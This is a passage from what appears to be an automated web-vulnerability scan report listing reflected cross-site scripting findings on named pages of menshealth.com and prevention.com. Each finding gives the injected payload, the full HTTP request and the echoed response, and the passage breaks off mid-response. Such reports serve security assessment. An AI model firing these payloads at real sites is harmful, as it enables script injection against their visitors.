<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta ht
...[SNIP]...
<h4>All iPhone Appfbea4<script>alert(1)</script>e1489106aca Downloads</h4>
...[SNIP]...

2.60. http://www.menshealth.com/downloads/all/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /downloads/all/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d84b0"><script>alert(1)</script>35d715869da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/all/?d84b0"><script>alert(1)</script>35d715869da=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:47:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=qu1fr7ptjthg34l1gat4vu1216; path=/
Content-Length: 134245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta ht
...[SNIP]...
<a href="http://www.menshealth.com/cda/initLogin.do?callback=http://www.menshealth.com/downloads/all/?d84b0"><script>alert(1)</script>35d715869da=1">
...[SNIP]...

2.61. http://www.menshealth.com/downloads/fitness/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /downloads/fitness/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20114"><script>alert(1)</script>a12626cc2b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/fitness/?20114"><script>alert(1)</script>a12626cc2b3=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:47:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=um8utgig0dhsp2d8at1etrlad2; path=/
Content-Length: 106686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-
...[SNIP]...
<a href="http://www.menshealth.com/cda/initLogin.do?callback=http://www.menshealth.com/downloads/fitness/?20114"><script>alert(1)</script>a12626cc2b3=1">
...[SNIP]...

2.62. http://www.menshealth.com/downloads/sex-and-relationships/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /downloads/sex-and-relationships/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 437c3"><script>alert(1)</script>bf08695ca35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/sex-and-relationships/?437c3"><script>alert(1)</script>bf08695ca35=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:47:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=pcob4b8h4v0l4v5inm191a17u5; path=/
Content-Length: 58754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-
...[SNIP]...
<a href="http://www.menshealth.com/cda/initLogin.do?callback=http://www.menshealth.com/downloads/sex-and-relationships/?437c3"><script>alert(1)</script>bf08695ca35=1">
...[SNIP]...

2.63. http://www.menshealth.com/fitness/cardio-activities/recent-10 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /fitness/cardio-activities/recent-10

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1754e"><img%20src%3da%20onerror%3dalert(1)>37d9ff07923 was submitted in the REST URL parameter 2. This input was echoed as 1754e"><img src=a onerror=alert(1)>37d9ff07923 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /fitness/cardio-activities1754e"><img%20src%3da%20onerror%3dalert(1)>37d9ff07923/recent-10 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Thu, 10 Mar 2011 16:38:34 +0000
ETag: "1299775114-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:18:18 GMT
Date: Thu, 10 Mar 2011 16:48:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<a href="http://www.menshealth.com/fitness/cardio-activities1754e"><img src=a onerror=alert(1)>37d9ff07923/recent-10">
...[SNIP]...

2.64. http://www.menshealth.com/fitness/getting-started/recent-10 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /fitness/getting-started/recent-10

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44a81"><img%20src%3da%20onerror%3dalert(1)>4f62b773f7c was submitted in the REST URL parameter 2. This input was echoed as 44a81"><img src=a onerror=alert(1)>4f62b773f7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /fitness/getting-started44a81"><img%20src%3da%20onerror%3dalert(1)>4f62b773f7c/recent-10 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Thu, 10 Mar 2011 16:48:19 +0000
ETag: "1299775699-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:18:26 GMT
Date: Thu, 10 Mar 2011 16:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<a href="http://www.menshealth.com/fitness/getting-started44a81"><img src=a onerror=alert(1)>4f62b773f7c/recent-10">
...[SNIP]...

2.65. http://www.menshealth.com/fitness/muscle-building/recent-10 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /fitness/muscle-building/recent-10

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24b67"><img%20src%3da%20onerror%3dalert(1)>b326d4dec92 was submitted in the REST URL parameter 2. This input was echoed as 24b67"><img src=a onerror=alert(1)>b326d4dec92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /fitness/muscle-building24b67"><img%20src%3da%20onerror%3dalert(1)>b326d4dec92/recent-10 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Thu, 10 Mar 2011 16:48:04 +0000
ETag: "1299775684-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:18:07 GMT
Date: Thu, 10 Mar 2011 16:48:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<a href="http://www.menshealth.com/fitness/muscle-building24b67"><img src=a onerror=alert(1)>b326d4dec92/recent-10">
...[SNIP]...

2.66. http://www.menshealth.com/fitness/sports-injuries/recent-10 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /fitness/sports-injuries/recent-10

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e37b4"><img%20src%3da%20onerror%3dalert(1)>e635af9fc62 was submitted in the REST URL parameter 2. This input was echoed as e37b4"><img src=a onerror=alert(1)>e635af9fc62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /fitness/sports-injuriese37b4"><img%20src%3da%20onerror%3dalert(1)>e635af9fc62/recent-10 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Thu, 10 Mar 2011 16:48:09 +0000
ETag: "1299775689-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:18:11 GMT
Date: Thu, 10 Mar 2011 16:48:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<a href="http://www.menshealth.com/fitness/sports-injuriese37b4"><img src=a onerror=alert(1)>e635af9fc62/recent-10">
...[SNIP]...

2.67. http://www.menshealth.com/mhlists/Best_and_Worst_Cities_for_Men_2010/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /mhlists/Best_and_Worst_Cities_for_Men_2010/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c56ed"><script>alert(1)</script>8b695b0b03f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mhlists/Best_and_Worst_Cities_for_Men_2010/?c56ed"><script>alert(1)</script>8b695b0b03f=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:47:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>    
...[SNIP]...
<a href="mailto:?subject=Men's Health Lists - The Best and Worst Cities for Men 2010&amp;body=http://www.menshealth.com/mhlists/Best_and_Worst_Cities_for_Men_2010/?c56ed"><script>alert(1)</script>8b695b0b03f=1">
...[SNIP]...

2.68. http://www.menshealth.com/mhlists/change_your_workout/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /mhlists/change_your_workout/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd4e7"><script>alert(1)</script>93b2e3e760a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mhlists/change_your_workout/?cd4e7"><script>alert(1)</script>93b2e3e760a=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:47:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>    
...[SNIP]...
<a href="mailto:?subject=Men's Health Lists - Switch Up a Boring Workout for Better Results&amp;body=http://www.menshealth.com/mhlists/change_your_workout/?cd4e7"><script>alert(1)</script>93b2e3e760a=1">
...[SNIP]...

2.69. http://www.menshealth.com/mhlists/lose_weight/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /mhlists/lose_weight/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2265b"><script>alert(1)</script>38008c984f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mhlists/lose_weight/index.php?2265b"><script>alert(1)</script>38008c984f8=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:47:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>    
...[SNIP]...
<a href="mailto:?subject=Men's Health Lists - 9 Weight-Loss Rules that Work&amp;body=http://www.menshealth.com/mhlists/lose_weight/index.php?2265b"><script>alert(1)</script>38008c984f8=1">
...[SNIP]...

2.70. http://www.menshealth.com/mhlists/sculpt_rock_hard_abs/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /mhlists/sculpt_rock_hard_abs/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be25a"><script>alert(1)</script>b3a5e873588 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mhlists/sculpt_rock_hard_abs/index.php?be25a"><script>alert(1)</script>b3a5e873588=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:47:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>    
...[SNIP]...
<a href="mailto:?subject=Men's Health Lists - Sculpt Rock-Hard Abs in 5 Steps&amp;body=http://www.menshealth.com/mhlists/sculpt_rock_hard_abs/index.php?be25a"><script>alert(1)</script>b3a5e873588=1">
...[SNIP]...

2.71. http://www.menshealth.com/mhlists/women_s_secrets/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /mhlists/women_s_secrets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3784e"><script>alert(1)</script>b1a5f15c19f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mhlists/women_s_secrets/?3784e"><script>alert(1)</script>b1a5f15c19f=1 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:47:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>    
...[SNIP]...
<a href="mailto:?subject=Men's Health Lists - 30 Secrets Every Woman Keeps from Her Man&amp;body=http://www.menshealth.com/mhlists/women_s_secrets/?3784e"><script>alert(1)</script>b1a5f15c19f=1">
...[SNIP]...

2.72. http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/makeup/bobbi.brown [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/makeup/bobbi.brown

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d69c5'style%3d'x%3aexpression(alert(1))'f84949f2dcb was submitted in the REST URL parameter 5. This input was echoed as d69c5'style='x:expression(alert(1))'f84949f2dcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beautyd69c5'style%3d'x%3aexpression(alert(1))'f84949f2dcb/makeup/bobbi.brown HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:05:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<input type='hidden' name='channel' value='lifelong.beautyd69c5'style='x:expression(alert(1))'f84949f2dcb' >
...[SNIP]...

2.73. http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/makeup/bobbi.brown [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/makeup/bobbi.brown

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb53a'style%3d'x%3aexpression(alert(1))'f8b875ad203 was submitted in the REST URL parameter 6. This input was echoed as eb53a'style='x:expression(alert(1))'f8b875ad203 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/eb53a'style%3d'x%3aexpression(alert(1))'f8b875ad203/bobbi.brown HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:05:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<input type='hidden' name='category' value='eb53a'style='x:expression(alert(1))'f8b875ad203' >
...[SNIP]...

2.74. http://www.prevention.com/cda/categorypage.do [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/categorypage.do

Issue detail

The value of the category request parameter is copied into an HTML comment. The payload 1ccff--><script>alert(1)</script>9f6b2966833 was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/categorypage.do?channel=news.voices&category=1ccff--><script>alert(1)</script>9f6b2966833&topic=slideshows HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000MHiT6PFBG0R40pivkWtXpec:145vrsjai; Path=/
Content-Length: 66032

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<!-- CK: -channel-newsvoices-category-1ccff--><script>alert(1)</script>9f6b2966833-categorylisting Generated at Thu Mar 10 12:04:51 EST 2011-->
...[SNIP]...

2.75. http://www.prevention.com/cda/categorypage.do [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/categorypage.do

Issue detail

The value of the category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f47b9"><script>alert(1)</script>91b875ad3d2 was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/categorypage.do?channel=news.voices&category=f47b9"><script>alert(1)</script>91b875ad3d2&topic=slideshows HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000ea5RHMtAJ24-ypFfHS_uFIL:145vrsjho; Path=/
Content-Length: 66068

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/prevention/newsvoices;topic=f47b9"><script>alert(1)</script>91b875ad3d2;sbtpc=slideshows;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.76. http://www.prevention.com/cda/categorypage.do [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/categorypage.do

Issue detail

The value of the category request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a8a3</script><script>alert(1)</script>8c04b44dec1 was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/categorypage.do?channel=news.voices&category=5a8a3</script><script>alert(1)</script>8c04b44dec1&topic=slideshows HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
